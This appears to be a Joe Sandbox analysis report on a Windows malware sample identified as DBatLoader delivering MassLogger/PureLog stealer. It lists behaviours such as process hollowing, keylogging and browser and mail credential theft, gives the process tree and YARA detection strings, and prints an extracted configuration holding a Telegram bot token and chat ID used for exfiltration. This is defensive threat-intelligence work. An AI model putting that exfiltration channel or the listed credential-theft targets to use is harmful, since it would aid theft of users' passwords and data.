Edit tour

Windows Analysis Report
ja811MqV4h.exe

Overview

General Information

Sample name:	ja811MqV4h.exe renamed because original name is a hash value
Original sample name:	882396942bded48550ad6cddeb511480.exe
Analysis ID:	1634983
MD5:	882396942bded48550ad6cddeb511480
SHA1:	8e8fb6f67eb813eb0bedc78cccc4da52419a9500
SHA256:	ad50c64c49f0ea386631f5c53a2ee7bd952e5168f5234704f9cb4f9be32f5944
Tags:	exeuser-abuse_ch
Infos:

Detection

DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected MSIL Logger

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Allocates memory in foreign processes

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Drops PE files with a suspicious file extension

Joe Sandbox ML detected suspicious sample

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

ja811MqV4h.exe (PID: 8664 cmdline: "C:\Users\user\Desktop\ja811MqV4h.exe" MD5: 882396942BDED48550AD6CDDEB511480)

cmd.exe (PID: 8720 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6556.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8744 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\33809.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

daphpvwO.pif (PID: 8816 cmdline: C:\\Users\\user\\Links\daphpvwO.pif MD5: C116D3604CEAFE7057D77FF27552C215)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU", "Telegram Chatid": "403948698"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1326628339.00000000023C9000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000005.00000001.1321974377.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1dad1:$a1: get_encryptedPassword 0x1daa5:$a2: get_encryptedUsername 0x1db69:$a3: get_timePasswordChanged 0x1da81:$a4: get_passwordField 0x1dae7:$a5: set_encryptedPassword 0x1d8b4:$a7: get_logins 0x1ce3e:$a8: GetOutlookPasswords 0x1c367:$a9: StartKeylogger 0x1ad9f:$a10: KeyLoggerEventArgs 0x1ad6e:$a11: KeyLoggerEventArgsEventHandler 0x1d988:$a13: _encryptedPassword
00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x222af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x217ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x21abb:$a4: \Orbitum\User Data\Default\Login Data 0x228b3:$a5: \Kometa\User Data\Default\Login Data
00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x22041:$a1: get_encryptedPassword 0x4a579:$a1: get_encryptedPassword 0x22015:$a2: get_encryptedUsername 0x4a54d:$a2: get_encryptedUsername 0x220d9:$a3: get_timePasswordChanged 0x4a611:$a3: get_timePasswordChanged 0x21ff1:$a4: get_passwordField 0x4a529:$a4: get_passwordField 0x22057:$a5: set_encryptedPassword 0x4a58f:$a5: set_encryptedPassword 0x21e24:$a7: get_logins 0x4a35c:$a7: get_logins 0x213ae:$a8: GetOutlookPasswords 0x498e6:$a8: GetOutlookPasswords 0x208d7:$a9: StartKeylogger 0x48e0f:$a9: StartKeylogger 0x1f30f:$a10: KeyLoggerEventArgs 0x47847:$a10: KeyLoggerEventArgs 0x1f2de:$a11: KeyLoggerEventArgsEventHandler 0x47816:$a11: KeyLoggerEventArgsEventHandler 0x21ef8:$a13: _encryptedPassword
00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
00000005.00000002.3833360482.000000002AEC0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data
00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d949:$a1: get_encryptedPassword 0x1d91d:$a2: get_encryptedUsername 0x1d9e1:$a3: get_timePasswordChanged 0x1d8f9:$a4: get_passwordField 0x1d95f:$a5: set_encryptedPassword 0x1d72c:$a7: get_logins 0x1ccb6:$a8: GetOutlookPasswords 0x1c1df:$a9: StartKeylogger 0x1ac17:$a10: KeyLoggerEventArgs 0x1abe6:$a11: KeyLoggerEventArgsEventHandler 0x1d800:$a13: _encryptedPassword
00000005.00000002.3812458119.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5e777:$a1: get_encryptedPassword 0x5e74b:$a2: get_encryptedUsername 0x5e80f:$a3: get_timePasswordChanged 0x5e727:$a4: get_passwordField 0x5e78d:$a5: set_encryptedPassword 0x5e55a:$a7: get_logins 0x5dae4:$a8: GetOutlookPasswords 0x5d00d:$a9: StartKeylogger 0x5ba45:$a10: KeyLoggerEventArgs 0x5ba14:$a11: KeyLoggerEventArgsEventHandler 0x5e62e:$a13: _encryptedPassword
00000005.00000002.3832462601.0000000028925000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.3832462601.0000000028925000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: daphpvwO.pif PID: 8816	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: daphpvwO.pif PID: 8816	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: daphpvwO.pif PID: 8816	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: daphpvwO.pif PID: 8816	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: daphpvwO.pif PID: 8816	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d1ce:$a1: get_encryptedPassword 0x4172c:$a1: get_encryptedPassword 0x78e2d:$a1: get_encryptedPassword 0x876c5:$a1: get_encryptedPassword 0x9f90f:$a1: get_encryptedPassword 0x2d1a2:$a2: get_encryptedUsername 0x41700:$a2: get_encryptedUsername 0x78e01:$a2: get_encryptedUsername 0x87699:$a2: get_encryptedUsername 0x9f8e3:$a2: get_encryptedUsername 0x2d266:$a3: get_timePasswordChanged 0x417c4:$a3: get_timePasswordChanged 0x78ec5:$a3: get_timePasswordChanged 0x8775d:$a3: get_timePasswordChanged 0x9f9a7:$a3: get_timePasswordChanged 0x2d17e:$a4: get_passwordField 0x416dc:$a4: get_passwordField 0x78ddd:$a4: get_passwordField 0x87675:$a4: get_passwordField 0x9f8bf:$a4: get_passwordField 0x2d1e4:$a5: set_encryptedPassword
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.1.daphpvwO.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
5.2.daphpvwO.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
5.2.daphpvwO.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.1.daphpvwO.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.3.daphpvwO.pif.268f6d60.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.3.daphpvwO.pif.268f6d60.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.3.daphpvwO.pif.268f6d60.0.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.3.daphpvwO.pif.268f6d60.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.3.daphpvwO.pif.268f6d60.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.3.daphpvwO.pif.268f6d60.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ade9:$a1: get_encryptedPassword 0x1adbd:$a2: get_encryptedUsername 0x1ae81:$a3: get_timePasswordChanged 0x1ad99:$a4: get_passwordField 0x1adff:$a5: set_encryptedPassword 0x1abcc:$a7: get_logins 0x1a156:$a8: GetOutlookPasswords 0x1967f:$a9: StartKeylogger 0x180b7:$a10: KeyLoggerEventArgs 0x18086:$a11: KeyLoggerEventArgsEventHandler 0x1aca0:$a13: _encryptedPassword
5.3.daphpvwO.pif.268f6d60.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f5c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1eac5:$a3: \Google\Chrome\User Data\Default\Login Data 0x1edd3:$a4: \Orbitum\User Data\Default\Login Data 0x1fbcb:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.2aec0000.9.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.2aec0000.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.2aec0000.9.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.2aec0000.9.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.2aec0000.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.2aec0000.9.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ade9:$a1: get_encryptedPassword 0x1adbd:$a2: get_encryptedUsername 0x1ae81:$a3: get_timePasswordChanged 0x1ad99:$a4: get_passwordField 0x1adff:$a5: set_encryptedPassword 0x1abcc:$a7: get_logins 0x1a156:$a8: GetOutlookPasswords 0x1967f:$a9: StartKeylogger 0x180b7:$a10: KeyLoggerEventArgs 0x18086:$a11: KeyLoggerEventArgsEventHandler 0x1aca0:$a13: _encryptedPassword
5.2.daphpvwO.pif.2aec0000.9.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f5c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1eac5:$a3: \Google\Chrome\User Data\Default\Login Data 0x1edd3:$a4: \Orbitum\User Data\Default\Login Data 0x1fbcb:$a5: \Kometa\User Data\Default\Login Data
5.1.daphpvwO.pif.438038.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.daphpvwO.pif.438038.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.ja811MqV4h.exe.212705a8.8.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
5.2.daphpvwO.pif.2990e990.6.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.2990e990.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.2990e990.6.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.2990e990.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.daphpvwO.pif.2990e990.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.2.daphpvwO.pif.2990e990.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
5.2.daphpvwO.pif.2990e990.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data
5.2.daphpvwO.pif.298e6458.7.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
5.2.daphpvwO.pif.298e6458.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.daphpvwO.pif.298e6458.7.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
5.2.daphpvwO.pif.298e6458.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
